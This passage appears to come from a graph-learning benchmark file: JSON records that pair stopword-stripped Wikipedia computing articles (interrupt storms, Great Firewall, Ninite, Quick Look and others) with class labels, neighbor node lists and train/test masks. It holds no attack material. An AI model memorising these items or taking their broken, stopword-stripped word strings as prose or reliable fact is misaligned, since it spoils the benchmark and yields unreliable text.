    "text": "Interrupt_storm:interrupt storm operating systems interrupt storm event processor receives inordinate number interrupts consume majority processor time interrupt storms typically caused hardware devices support interrupt rate limiting interrupt processing typically non-preemptible task time-sharing operating systems interrupt storm cause sluggish response user input even appear freeze system completely state commonly known live lock state system spending resources processing interrupts instead completing work end-user appear processing anything often output interrupt storm sometimes mistaken thrashing since similar symptoms unresponsive sluggish response user input little output common causes include misconfigured faulty hardware faulty device drivers flaws operating system metastability one components latter condition rarely occurs outside prototype amateur-built hardware modern hardware operating systems methods mitigating effect interrupt storm example ethernet controllers implement interrupt rate limiting causes controller wait programmable amount time interrupt generates present within device similar functionality usually written device driver and/or operating system common cause device behind another signals interrupt apic advanced programmable interrupt controller computer peripherals generate interrupts apic number interrupts always less typically 15 modern pc number devices os must query driver registered interrupt ask interrupt originated hardware faulty drivers may always claim yes causing os query drivers registered interrupt one interrupt processed time device originally requested interrupt therefore get interrupt serviced new interrupt generated cleared processor becomes swamped continuous interrupt signals operating system live lock interrupt storm caused fault kernel debugger usually break storm unloading faulty driver allowing driver underneath faulty one clear interrupt user input still possible drivers often implemented 3rd party operating systems also polling mode queries pending interrupts fixed intervals round-robin fashion mode set globally per-driver per-interrupt basis dynamically os detects fault condition excessive interrupt generation polling mode may enabled dynamically number interrupts resource use caused interrupt passes certain thresholds thresholds longer exceeded os may change interrupting driver interrupt interrupt handling globally interrupt mode polling mode interrupt rate limiting hardware usually negates use polling mode still happen normal operation intense i/o processor unable switch contexts quickly enough keep pace perhaps first interrupt storm occurred apollo 11 lunar descent 1969 interrupt rate limiting must carefully configured optimum results example ethernet controller interrupt rate limiting buffer packets receives network interrupt rate set low controller buffer overflow packets dropped rate must take account fast buffer may fill interrupts interrupt latency interrupt transfer buffer system hardware-based software-based approaches problem example freebsd detects interrupt storms masks problematic interrupts time response system used napi example hardware-based approach system driver starts interrupt enabled state interrupt handler disables interrupt lets thread/task handle event task polls device processing number events enabling interrupt another interesting approach using hardware support one device generates interrupt event queue state changes empty empty free dma descriptors rx fifo tail device drops event event added tail fifo entry marked occupied point entry tail−1 free cleared interrupt generated level interrupt tail pointer incremented hardware requires interrupt acknowledged cpu interrupt handler handle valid dma descriptors head return interrupt",
    "neighbors": [
      11075,
      3725,
      7983,
      2960,
      5457,
      10612,
      1176,
      5529,
      1660,
      3197,
      3294,
      5823
    ],
    "mask": "Test"
  },
  {
    "node_id": 9106,
    "label": 4,
    "text": "PureMessage:puremessage sophos puremessage anti-spam program sophos plc aimed primarily corporate environments sophos puremessage microsoft exchange — part email security data protection — blocks spam viruses spyware phishing scanning inbound outbound internal email exchange message stores proactively protects email-borne threats prevents confidential data lost",
    "neighbors": [
      2424,
      6762,
      6797,
      7983,
      9055,
      823,
      1304,
      3487
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9107,
    "label": 2,
    "text": "Bluebottle_OS:bluebottle os bluebottle formerly known active object system aos recently a2 modular object-oriented operating system originally developed eth zurich unconventional features including automatic garbage-collected memory management zooming user interface a2 next generation native oberon x86 pc version niklaus wirth oberon operating system small fast supports multiprocessor computers provides soft real-time operation entirely written upward-compatible dialect oberon programming language called active oberon oberon active oberon members pascal family along modula-2 a2 design allows development efficient systems based active objects run directly hardware active objects represent combination traditional oops notion object combined thread executes context object active oberon implementation active object may include addition activity activity ancestor objects differences a2 mainstream operating systems extremely minimalistic design completely implemented type-safe language automatic memory management combined powerful flexible set primitives level programming language runtime system synchronisation access internal properties objects competing execution contexts kernel layer a2 provides flexible collection modules providing unified abstractions devices services file systems user interfaces network connections media codecs etc bluebottle os replaces older oberon os unique tui zooming user interface zui significantly like conventional graphical user interfaces like oberon though user interface supports point-and-click metaphor execute commands directly text similar clicking hyperlinks browser",
    "neighbors": [
      9762,
      2179,
      5380,
      6979,
      9320,
      5356,
      8524,
      9964,
      7983,
      8082,
      499,
      5363,
      8219,
      6558,
      7775
    ],
    "mask": "Test"
  },
  {
    "node_id": 9108,
    "label": 1,
    "text": "Data_administration:data administration data administration data resource management organizational function working areas information systems computer science plans organizes describes controls data resources data resources usually stored databases database management system software electronic spreadsheets many smaller organizations data administration performed occasionally small component database administrator ’ work context information systems development data administration ideally begins system conception ensuring data dictionary help maintain consistency avoid redundancy model database make logical usable means data modeling including database normalization techniques according data management association dama data resource management development execution architectures policies practices procedures properly manage full data lifecycle needs enterprise data resource management may thought managerial activity applies information system data management tools task managing organization ’ data resource meet company ’ business needs information provide shareholders since beginning information age businesses need types data business activity data created business transaction made need data created data new direction needed focuses managing data critical resource organization directly support business activities data resource must managed intensity formality critical resources managed organizations must emphasize information aspect information technology determine data needed support business use appropriate technology build maintain high-quality data resource provides support data resource quality measure well organization data resource supports current future business information demand organization data resource support current business information demand sacrificing future business information demand must support current future business information demand ultimate data resource quality stability across changing business needs changing technology corporate data resource must developed within single organization-wide common data architecture data architecture science method designing constructing data resource business driven based real-world objects events perceived organization implemented appropriate operating environments overall structure data resource provides consistent foundation across organizational boundaries provide easily identifiable readily available high-quality data support business information demand common data architecture formal comprehensive data architecture provides common context within data organization disposal understood integrated subject oriented meaning built data subjects represent business objects business events real world interest organization data captured maintained",
    "neighbors": [
      9112,
      4155,
      3004,
      2901
    ],
    "mask": "Train"
  },
  {
    "node_id": 9109,
    "label": 2,
    "text": "Quick_Look:quick look quick look quick preview feature developed apple inc. introduced operating system mac os x 10.5 leopard feature announced worldwide developers conference jun 11 2007 os x finder always icon previews quick look allows users look contents file finder full near-full size depending size document relative screen resolution preview files pdfs html quicktime readable media plain text rtf text documents iwork keynote pages numbers documents odf documents microsoft office word excel powerpoint files including ooxml raw camera images quick look also opened full screen launched command line additionally multi-page documents like powerpoint slide shows navigated using slide previews side preview window quick look technology implemented throughout apple suite software starting mac os x 10.5 including ichat theater time machine finder cover flow quick look apis available developers via quick look framework ios part quartz framework mac since debut quick look included number generators common file types plug-ins added quick look allow previewing content file formats plug-ins also used add additional functionality quick look syntax highlighting source code files add plug-in quick look needs placed folder codice_1 activate plug-in either computer needs restarted quick look needs reset command multiple ways invoke quick look keyboard shortcuts command line menu quick look exploited conducting forensic examination computer contents thumbnail cache created user random subfolder codice_2 called com.apple.quicklook.thumbnailcache cache contains two files quick look thumbnails stored documents internal disks also documents located removable disks including encrypted pose significant security hole document may well number thumbnails different dimensions range large small cache reset invoking codice_3 command via terminal window",
    "neighbors": [
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      9319,
      3691,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      1732,
      713,
      9418,
      3790,
      9430,
      3289,
      4318,
      231,
      9451,
      2288,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      823,
      9529,
      4933,
      9035,
      1878,
      4457,
      9100,
      1439,
      5546,
      8627,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9110,
    "label": 3,
    "text": "Mr._Do's_Castle:mr. castle mr. castle arcade game released universal september 1983 asian title game mr. versus unicorns though marketed sequel original mr released one year earlier game bears far closer resemblance space panic second mr. series video games although n't intended began game called knights vs. unicorns u.s. division universal persuaded japanese arm modify graphics mr. game taking account first game popularity object mr. castle score many points possible collecting cherries defeating unicorn-like monsters game takes place castle filled platforms ladders flipped one platform another player controls mr. collects cherries using hammer knock blocks contain various platforms empty holes left knocked-out blocks serve traps monsters monster falls hole player defeat causing block monster fall top player takes long complete level monsters transform faster difficult forms occasionally multiply game advances next level cherries level collected enemies defeated player loses life mr. caught monster game ends player runs lives mr player earn extra life collecting letters word extra regular monsters changed monsters bearing extra letters collecting three keys distributed around playfield picking magic shield top floor monsters state easier defeat normal simple hammer strike job brief interval change back normal forms game also offers bonus credit collecting rare diamond appears playfield random intervals cherry blocks absent mr. vs. unicorns early revisions mr. castle instead blocks keys skulls start stage fill blocks left behind unicorns fall holes left alone time three ways complete level version versus four ways complete levels mr. castle addition early revisions fill blocks change colors every two stages mr. castle ported colecovision msx atari 2600 atari 5200 commodore 64 sharp x68000 atari commodore colecovision published parker bros. version atari 8-bit family released mr. castle followed mr. wild ride run run released 1984",
    "neighbors": [
      1776,
      11373,
      9006,
      8151
    ],
    "mask": "Test"
  },
  {
    "node_id": 9111,
    "label": 3,
    "text": "Cascade_Lake_(microarchitecture):cascade lake microarchitecture cascade lake intel codename 14nm server enthusiast processor microarchitecture cascade lake optimization intel process-architecture-optimization model intel states first microarchitecture support 3d xpoint-based memory modules also feature deep learning boost instructions cascade lake-ap branded xeon platinum 9200 series skus soldered motherboard cpus n't support optane memory",
    "neighbors": [
      3459,
      5380,
      2821,
      3973,
      8325,
      9095,
      5386,
      9611,
      4108,
      9741,
      398,
      5649,
      7313,
      5523,
      6804,
      8851,
      4886,
      3352,
      9500,
      5883,
      2088,
      10669,
      9391,
      10675,
      4276,
      1461,
      10548,
      2237,
      5309,
      8125,
      8126,
      833,
      6339,
      5444,
      9541,
      1998,
      2638,
      977,
      2514,
      5073,
      5844,
      597,
      9435,
      7134,
      1119,
      1000,
      7657,
      4204,
      5356,
      8684,
      5871,
      9582,
      499,
      8820,
      3317,
      4217,
      4603,
      5503
    ],
    "mask": "Test"
  },
  {
    "node_id": 9112,
    "label": 1,
    "text": "Database_administrator:database administrator database administrators dbas use specialized software store organize data role may include capacity planning installation configuration database design migration performance monitoring security troubleshooting well backup data recovery list skills required become database administrators database administrators benefit bachelor degree master degree computer science associate degree certificate may sufficient work experience many certifications available becoming certified database administrator try share best many certifications offered database vendors database administrator certifications may earned passing series tests sometimes requirements schools offering database administration degrees also found example database administrator responsibilities include following tasks",
    "neighbors": [
      8201,
      1037,
      10258,
      2068,
      1049,
      5658,
      8742,
      10286,
      11327,
      9286,
      72,
      10326,
      9314,
      11362,
      9828,
      8808,
      2669,
      2681,
      1146,
      2688,
      9867,
      6797,
      10389,
      4263,
      10413,
      2222,
      5808,
      10418,
      9397,
      3254,
      3768,
      11457,
      4309,
      9942,
      2780,
      10469,
      10471,
      6383,
      9467,
      3323,
      5373,
      1801,
      9481,
      10505,
      8979,
      7446,
      10518,
      4376,
      11030,
      5403,
      7968,
      290,
      1314,
      7461,
      3366,
      2344,
      7983,
      11571,
      823,
      9527,
      4412,
      4416,
      2369,
      5441,
      5953,
      10048,
      8518,
      853,
      2901,
      860,
      7022,
      9075,
      9079,
      10632,
      9108,
      2456,
      9631,
      9634,
      7080,
      5546,
      5550,
      3004,
      9661,
      9663,
      9177,
      987,
      9183,
      4065,
      6124,
      2544,
      10737,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9113,
    "label": 4,
    "text": "Jericho_Forum_Commandments:jericho forum commandments jericho forum® commandments define areas principles must observed planning de-perimeterised future whilst building “ good security ” commandments specifically address areas security necessary deliver de-perimeterised vision commandments serve benchmark concepts solutions standards systems assessed measured jericho forum commandments issued creative commons license found https //collaboration.opengroup.org/jericho/commandments_v1.2.pdf",
    "neighbors": [
      9513,
      9858,
      9954
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9114,
    "label": 2,
    "text": "Microsoft_RPC:microsoft rpc microsoft rpc microsoft remote procedure call modified version dce/rpc additions include partial support ucs-2 unicode strings implicit handles complex calculations variable-length string structure paradigms already present dce/rpc dce 1.0 reference implementation allows constructs size_is len possibly size_is len-1 msrpc allows much complex constructs size_is len 2 1 even length_is max ~0x7 0x7 common expression dcom idl files msrpc used microsoft seamlessly create client/server model windows nt little effort example windows server domains protocols entirely msrpc based microsoft dns administrative tool microsoft exchange server 5.5 administrative front-ends msrpc client/server applications mapi made secure proxying mapi set simple msrpc functions enable encryption msrpc layer without involving mapi protocol msrpc derived distributed computing environment 1.2 reference implementation open software foundation copyrighted microsoft dce/rpc originally commissioned open software foundation industry consortium set vendor- technology-neutral open standards computing infrastructure none unix vendors represented open group wanted use complex dce components dce/rpc time microsoft component object model based heavily msrpc adding interfaces inheritance marshalling semantics dce/rpc used serialize method calls results processes separate address spaces albeit com initially allow network calls different machines distributed component object model dcom com extended software components distributed across several networked computers dcom originally called network ole extends microsoft com provides communication substrate microsoft com+ application server infrastructure microsoft donated dcom open group",
    "neighbors": [
      10243,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      8246,
      2120,
      4178,
      9813,
      603,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      3224,
      3235,
      4771,
      7846,
      10414,
      3250,
      214,
      9434,
      736,
      4321,
      6370,
      9441,
      4836,
      10465,
      1770,
      11498,
      3821,
      10991,
      6927,
      8976,
      5401,
      5913,
      11546,
      4384,
      9505,
      2854,
      10024,
      10026,
      10029,
      11570,
      7484,
      5952,
      1348,
      2887,
      844,
      10079,
      11616,
      5492,
      2943,
      9609,
      8080,
      10654,
      8607,
      6584,
      2493,
      7629,
      8161,
      6114,
      2027,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 9115,
    "label": 2,
    "text": "Motorola_One:motorola one motorola one stylised motorolaone series android smartphones developed motorola mobility motorola phone series uses android one version android motorola mobile phones run android one called motorola one three models released first 2018 motorola ones phones shipped near stock version android guaranteed receive two upgrades version android security updates minimum 3 years release first release series simply named motorola one however carry alternative name p30 play areas asia released october 2018 available two different colours white black came market price 180 euros making low mid range phone second iteration mobile phone series named motorola one vision released may 2019 boasted larger previous screen 48mp camera well upto 1tb sd card slot came market price 300 euros making mid range phone expensive series third release series named motorola one action released august 2019 first phone market record landscape video footage held portrait position due array three camera came market price 260 euros making mid range phone",
    "neighbors": [
      10658,
      392,
      5963,
      5100,
      2383,
      1776,
      7983,
      7835,
      2838,
      1083,
      7548,
      9949,
      3835
    ],
    "mask": "None"
  },
  {
    "node_id": 9116,
    "label": 7,
    "text": "Kimble_(app):kimble app kimble cloud-based psa software application kimble founded 2010 sean hoban mark robinson david scott company headquartered london england offices united states including boston park city chicago atlanta 2018 kimble secured investment accel-kkr technology-focused investment firm based silicon valley kimble provides professional services automation psa solution known kimble psa built salesforce platform recognized salesforce premier partner kimble app automates pipeline forecasting resource planning delivery management project accounting kimble applications helps professional service organizations run project-based businesses better global leaders consulting software hi-tech ntt data tcs sage canon use kimble optimize resource utilization profitability business scalability kimble leading software vendor focuses exclusively professional services automation psa putting energy innovating features easy-to-use functionality improve team collaboration efficiency around key services processes built work seamlessly crm kimble drives forward-looking focus timely decision making intelligent insights guidance 2018 ranked best professional services automation software g2 crowd momentum grid",
    "neighbors": [
      4194,
      10090
    ],
    "mask": "Test"
  },
  {
    "node_id": 9117,
    "label": 4,
    "text": "Great_Firewall:great firewall great firewall china gfw combination legislative actions technologies enforced people republic china regulate internet domestically role internet censorship china block access selected foreign websites slow cross-border internet traffic effect includes limiting access foreign information sources blocking foreign internet tools e.g google search facebook twitter wikipedia others mobile apps requiring foreign companies adapt domestic regulations besides censorship gfw also influenced development china internal internet economy nurturing domestic companies reducing effectiveness products foreign internet companies great firewall operated golden shield project bureau public information network security supervision mentioned one country two systems principle china special administrative regions hong kong macau affected project sars governmental legal systems therefore enjoy high degree autonomy nevertheless u.s. state department reported central government authorities closely monitored internet use regions term great firewall china portmanteau firewall great wall china first used print geremie barmé 1997 term started use beijing 1996 stephen guerin redfish group beijing-based web consultancy 1996 interviews guerin cnn andrea koppel npr marky kay magistad included guerin discussing china reversing firewall political ideological background gfw project considered one deng xiaoping ’ favorite sayings early 1980s open window fresh air flies blown saying related period economic reform china became known socialist market economy superseding political ideologies cultural revolution reform led china towards market economy opened market foreign investors nonetheless despite economic freedom values political ideas communist party china protected swatting flies unwanted ideologies internet china arrived 1994 inevitable consequence supporting tool socialist market economy gradually internet availability increasing internet become common communication platform tool trading information ministry public security took initial steps control internet use 1997 issued comprehensive regulations governing use key sections articles 4–6 1998 communist party china feared china democracy party cdp would breed powerful new network party elites might able control cdp immediately banned followed arrests imprisonment year gfw project started first part project lasted eight years completed 2006 second part began 2006 ended 2008 6 december 2002 300 people charge gfw project 31 provinces cities throughout china participated four-day inaugural comprehensive exhibition chinese information system exhibition many western high-tech products including internet security video monitoring human face recognition purchased estimated around 30,000–50,000 police employed gigantic project fang binxing known substantial contribution china internet censorship infrastructure dubbed father china great fire wall china view internet internet sovereignty notion internet inside country part country sovereignty governed country united states several western countries passed laws creating computer crimes beginning 1970s china legislation 1997 year china sole legislative body national people congress npc passed cl97 law criminalizes cyber crimes divided two broad categories crimes target computer networks crimes carried computer networks behavior illegal latter category includes among many things dissemination pornographic material usurping state secrets chinese judges critical cl97 calling ineffective unenforceable however npc claimed intentionally left law flexible could open future interpretation development given gaps law central government china relies heavily administrative body state council determine falls definitions determinations required go npc legislative process result cpc ended relying heavily state regulation carry cl97 latter definition online activities punishable cl97 crimes carried computer networks used justification great firewall cited government blocks isp gateway connections access anything internet definition also includes using internet distribute information considered harmful national security using internet distribute information considered harmful public order social stability chinese morality central government relies heavily state council regulators determine specific online behavior speech fall definitions reasons behind internet censorship china include part great firewall beginning 2003 china started golden shield project massive surveillance censoring system hardware provided mostly u.s. companies including cisco systems project completed 2006 carried buildings machines manned civilians supervised china national police force public security bureau psb main operating activities gatekeepers golden shield project include monitoring domestic websites email searching politically sensitive language calls protest damaging content found local psb officials dispatched investigate make arrests however late 2007 golden shield project proved operate sporadically best users long adapted internet blocking using proxy servers among strategies make communications circumnavigate blocked content february 2008 chinese government announced operation tomorrow effort crack youth usage internet cafés play online games view content declared illegal internet cafés extremely popular way getting online developing countries fewer people afford personal computer regulated chinese government local chinese government officials minors china age 18 allowed internet cafés although law widely ignored enforced spurred creation underground black web bars visited underage 2008 internet cafés required register every customer log used internet records may confiscated local government officials psb illustrate local regulation internet cafés one instance government official town gedong lawfully banned internet cafés operating town believed harmful minors frequented play online games including considered violent surf internet however internet cafés town simply went underground minors deterred visiting may 2015 china indefinitely blocked access chinese-language wikipedia contrast 2018 english-language wikipedia blocked rarely intermittently china 2017 discussed plans version wikipedia may 2019 language versions wikipedia blocked chinese government system blocks content preventing ip addresses routed consists custom dns proxy servers filtering mechanism researchers university california davis university new mexico said censorship system true firewall since banned material sometimes able pass several routers entire system without blocked filtering mechanism may differ one chinese isp another tend common possible reported methods included research evidence indicated suspicion great firewall china sense one surveilled online leads chilled speech self-censorship effective blocking internet content great firewall great firewall form trade protectionism allowed china grow internet giants tencent alibaba baidu china version many foreign web properties example tencent video youtube tencent weibo twitter qzone facebook wechat whatsapp ctrip orbitz others zhihu quora nearly one quarter global internet population 700 million users internet behind gfw considered parallel universe internet exists outside mainland chinese internet censorship programs censored web sites include among things blocked web sites indexed lesser degree chinese search engines sometimes considerable impact search results according new york times google set computer systems inside china try access web sites outside country site inaccessible added google china blacklist however unblocked web sites reindexed referring google first-hand experience great firewall hope international community reveal secrets simon davies founder london-based pressure group privacy international challenging google reveal technology used china behest way understand nature beast perhaps develop circumvention measures opening communications would dossier extraordinary importance human rights davies says google yet respond call great firewall blocks destination ip addresses domain names inspects data sent received basic censorship circumvention strategy use proxy nodes encrypt data circumvention tools combine two mechanisms 2008 english-language bbc website chinese language website unblocked 2017 china censored google including google maps alternate map applications available reporters without borders suspects countries cuba vietnam zimbabwe belarus obtained surveillance technology china although censorship countries less stringent china even one see booming sector well one dynamic china second largest information communication technology market according international data corporation market reach us 844 billion 2020 market big data expected become part industrial world china 2025 regardless strictness industrial internet architecture already place despite strict government regulations chinese people continue protest government attempt censor internet covert protesters set secure ssh vpn connections using tools ultrasurf also utilize widely available proxies virtual private networks fanqiang 翻墙 climb wall bypass gfw active protest absent chinese people post grievances online occasions successful 2003 death sun zhigang young migrant worker sparked intense widespread online response chinese public despite risk government punishment months later premier wen jiabao abolished chinese law led death sun ever since dissent regularly created turmoil internet china also january 2010 google announced longer censor web search results china even means might shut chinese operations altogether many chinese people went company chinese offices display grievances offer gifts flowers fruits cigarettes chinese corporate statutes mandate domestic foreign internet companies business mainland china cooperate great firewall efforts companies responsible content put websites well content users post website helps china promote self-censorship making censoring job less difficult allowing keep state licenses media chinese subsidiaries american companies yahoo google google services blocked google still presence china microsoft comply condition operating leadership companies regularly express distaste china great firewall policies vein consider necessary part business china better alternative would china business jerry yang founder yahoo additionally implied presence foreign internet companies china eventually help bring less internet restriction china critics argue gfw consequence china paranoia potential internet spreading opposition one-party rule arguments given china method limited internet impedes freedom speech holds economically speaking discouraging innovation disapproving communication important ideas prohibiting firms use certain services use also thought detrimental approach students professors since access resources promote sharing work ideas comprehensive learning another important argument gfw fear critics big countries begin following china approach whole purpose creation internet could put jeopardy like-minded countries successful imposing restrictions inhabitants globalized online companies free global exchange information could cease exist united states trade representative ustr “ national trade estimate report ” 2016 referred china digital great firewall china filtering cross-border internet traffic posed significant burden foreign suppliers claude barfield american enterprise institute expert international trade suggested u.s. government bring case firewall huge trade barrier world trade organization january 2017 8 24 trafficked websites china blocked great firewall created burden foreign suppliers rely websites sell products services.the lobby 2016 business climate survey showed 79 percent members reported negative impact business due internet censorship according stephen rosen gfw reflective chinese government fear civil disobedience rebellion among chinese population chinese communist party rule",
    "neighbors": [
      4224,
      10368,
      1157,
      5254,
      138,
      5135,
      1299,
      1692,
      5405,
      8735,
      4389,
      8998,
      3625,
      11693,
      10417,
      6834,
      5887,
      8630,
      8640,
      3777,
      2884,
      3781,
      11461,
      1364,
      11221,
      2661,
      3941,
      10341,
      2409,
      9193,
      1650,
      4725,
      5749,
      8054,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 9118,
    "label": 2,
    "text": "Rob_Savoye:rob savoye rob savoye primary developer gnash developer gnu project worked debian red hat dozens free/open source software projects among first employees cygnus support sold red hat 2001 began programming computers 1977 using fortran 4 projects worked include gcc gdb dejagnu cygwin ecos ctas rob savoye manages unofficial website rainbow family living light resides outside nederland colorado avid ice climber outdoorsman additionally rob involved search rescue lost stranded hikers climbers founding member imsar ilchester mountain search rescue organization libre planet 2011 savoye received individual achievement fsf award advancement free software work gnash",
    "neighbors": [
      4528,
      9579,
      9455
    ],
    "mask": "None"
  },
  {
    "node_id": 9119,
    "label": 2,
    "text": "NASLite:naslite naslite free commercial linux distribution designed turn conventional x86-based computers pci interface simple network-attached storage device fits onto single 3½-inch high density floppy disk formatted 1.72mb naslite boots floppy disk runs 4mb ram disk allowing full capacity hard disk drives used storage naslite supports serving files clients running windows linux mac os x well others versions available support different networking protocols booting operating system cd-rom usb mass storage device hard disk drive versions naslite variants contain gpl 'd proprietary components gpl 'd components available end user per gplv2 naslite runs well obsolete hardware requires least computer pci interface minimum requirements 486dx pentium cpu 16 mb ram pci ethernet card ide hard disk drive floppy disk drive naslite turns target machine simple file server since file serving takes little processing speed opposed network speed hard drive speed able run comparatively old computers little processing power runs floppy disk hypothetically usually four ide channels used hard drives naslite three variants supporting different file serving protocols samba support serving microsoft windows client machines nfs serve unix based operating systems ftp anonymous ftp also supports remote administration via telnet though ssh includes web server display usage error logs since based linux naslite like linux distributions supports new larger hard drives often supported older machines bypassing bios directly accessing hard drive greatly increasing usefulness older computer serving large amounts data",
    "neighbors": [
      8837,
      7435,
      6797,
      10127,
      2321,
      5397,
      4887,
      9625,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      7983,
      2738,
      4790,
      823,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      7364,
      2375,
      4039,
      8907,
      1110,
      9693,
      225,
      2914,
      485,
      3685,
      10341,
      9064,
      4841,
      6890,
      1515,
      7020,
      7913,
      7534,
      2671,
      7920,
      8177,
      9074,
      499,
      5363,
      5492,
      9461,
      9844,
      10860,
      6393,
      11388,
      8957
    ],
    "mask": "Test"
  },
  {
    "node_id": 9120,
    "label": 3,
    "text": "Master_of_the_Lamps:master lamps master lamps one first music video games activision published game 1985 several home computer systems master lamps death arabian prince father king shatters three enchanted oil lamps freeing three genies trapped within genies overrun palace contain prince must reassemble three broken lamps player role prince wearing white thawb red keffiyeh must journey seven dens genie den contains one lamp pieces gameplay alternates two modes first prince maneuvers flying carpet winding tunnel genie den practice requires player direct carpet diamond-shaped gates appear failure returns prince beginning tunnel den second mode player strikes gong thrice summon genie genie draws hookah blows ball smoke smoke emerges sequence tones player must repeat call-and-response pattern order play tone player must strike corresponding gong player strikes incorrect gong strikes correct gong early genie magic transports prince beginning tunnel seven dens first genie tone audible manifests colored quaver eighth note floats toward ground seven dens second genie tone inaudible player must match color note color corresponding gong seven dens third genie tone audible note appears player must recognize note pitch strike correct gong player passes trial gateway another tunnel opens passing musical trials three genies player navigates one final tunnel palace player succeeds prince reclaims palace antic 1986 called master lamps offbeat game program number unique elements stating become little monotonous magazine approved non-violent gameplay",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 9121,
    "label": 2,
    "text": "Ninite:ninite ninite codenamed volery private beta stage package management system offering lets users automatically install popular applications windows operating system allows users make selection list applications bundles selection single installer package free personal use paid version ninite pro available professional use alternatively cheaper albeit less robust version ninite pro known ninite updater available users want ability one-click updates without features offered ninite pro ninite works windows 7 later presents user list programs generates custom installer executable based user selection run installer downloads installs selected programs ninite installer always downloads latest version program accomplished downloading regularly-updated list applications download urls ninite servers time program run benefits using ninite rather individual applications installers include toolbar/adware free installations ability update multiple applications automatic selection architecture 64-bit vs 32-bit language selection based operating system language error reporting one installations fail austrian magazine der standard wrote ninite gets good basic package software computer computerwoche listed ninite number 11 28 reviewed freeware tools pc magazine listet batch-installer software installation one ninite webpage user chooses software preference activating checkboxes continues downloading executable installer preconfigured users custom selection executing installer previously chosen software unattended without requested user interaction installed computer chrome opera firefox discord skype pidgin thunderbird trillian itunes vlc aimp foobar2000 winamp musicbee audacity k-lite codec pack gom spotify cccp mediamonkey handbrake java adoptopenjdk x64 version 8 11 java adoptopenjdk 8 .net silverlight adobe air krita blender paint.net gimp irfanview xnview inkscape faststone greenshot sharex foxit reader libreoffice sumatrapdf cutepdf pdfcreator openoffice ms essentials malwarebytes avast avg spybot 2 avira superantispyware qbittorrent dropbox google backup sync onedrive sugarsync evernote google earth steam keepass 2 everything nv access teamviewer 14 imgburn realvnc teracopy cdburnerxp revo launchy windirstat glary infrarecorder classic start 7-zip peazip winrar python filezilla notepad++ jdk adoptopenjdk x64 8 11 jdk adoptopenjdk 8 jdk amazon corretto x64 8 11 jdk amazon corretto 8 winscp putty winmerge eclipse visual studio code ninite installer/updater includes software latest version discontinued software longer maintained software author ninite continues install python v2 despite python v3 preferred version recommended python users upgrade python v3 end 2019 july 2019 ninite offer python v3 option microsoft silverlight deprecated final update released beginning 2019 microsoft security essentials discontinued january 2020 time windows 7 newer versions windows functionality already install operating system feature name windows defender classic start discontinued end 2017 following software updated 3 years cutepdf sumatrapdf cccp imgburn infrarecorder launchy",
    "neighbors": [
      8584,
      1417,
      6797,
      4623,
      894,
      9746,
      10898,
      1813,
      11418,
      10525,
      3114,
      2859,
      4010,
      7983,
      4403,
      5067,
      5070,
      5078,
      11225,
      1242,
      2401,
      9953,
      8554,
      3573,
      6270
    ],
    "mask": "None"
  },
  {
    "node_id": 9122,
    "label": 3,
    "text": "Socket_FM2:socket fm2 socket fm2 cpu socket used amd desktop trinity richland apus connect motherboard well athlon x2 athlon x4 processors based fm2 launched september 27 2012 motherboards feature new fm2 cpu socket also utilize amd new a85x chipset socket similar fm1 based 31×31 grid pins 5×7 central void 3 pins missing corner additional key pins missing compared socket fm1 two key pins moved one removed leaving 904 pins available chipsets consult fusion controller hubs fch steamroller-based kaveri apus supported see socket fm2+ fm2r2 socket fp3 bga- 4 holes fastening heatsink motherboard placed rectangle lateral lengths 48 mm 96 mm amd sockets socket am2 socket am2+ socket am3 socket am3+ socket fm2 cooling solutions therefore interchangeable",
    "neighbors": [
      3586,
      9475,
      3588,
      8452,
      9092,
      10375,
      3464,
      4872,
      5645,
      398,
      7058,
      10260,
      4246,
      7963,
      2719,
      2463,
      4767,
      2850,
      7712,
      1322,
      2094,
      11183,
      1329,
      6705,
      3892,
      8629,
      9400,
      6978,
      11331,
      9157,
      3783,
      11080,
      2764,
      7247,
      9551,
      7122,
      9427,
      10715,
      7132,
      2525,
      9057,
      4451,
      5859,
      1260,
      7788,
      7151,
      1137,
      1651,
      11130
    ],
    "mask": "Test"
  },
  {
    "node_id": 9123,
    "label": 2,
    "text": "Craig_Federighi:craig federighi craig federighi born may 27 1969 apple senior vice president software engineering federighi oversees development ios ipados macos apple common operating system engineering teams teams responsible delivering software heart apple products including user interface applications frameworks graduating acalanes high school lafayette california federighi earned master science degree computer science bachelor science electrical engineering computer science university california berkeley italian descent federighi married 2014 federighi worked steve jobs next led development enterprise objects framework joined apple acquired next 1996 left 1999 enterprise company ariba chief technology officer returned apple 2009 led macos engineering march 23 2011 federighi succeeded bertrand serlet vice president mac software engineering apple august 27 2012 promoted senior vice president reporting ceo tim cook october 29 2012 upon announcement scott forstall departure apple role expanded encompass ios addition mac software engineering september 2016 federighi reported 500,000 shares apple stock worth us 100 million july 2019 within community apple users developers federighi known energetic presentations new apple software frequently featuring absurdist humor references somewhat bouffant hair use new software features organize events office karaoke parties camping trips claimed love band rush federighi notable nicknames around apple hair force one ” additionally apple ceo tim cook called superman first appearance onstage major apple event wwdc 2009 helped bertrand serlet introduce mac os x snow leopard made another appearance 2010 'back mac presentation showing mac os x lion introduced ios 7 os x mavericks apple wwdc 2013 developer conference ios 8 os x yosemite wwdc 2014 wwdc 2015 delivered apple 2-hour main opening-day presentation introducing ios 9 os x 10.11 el capitan 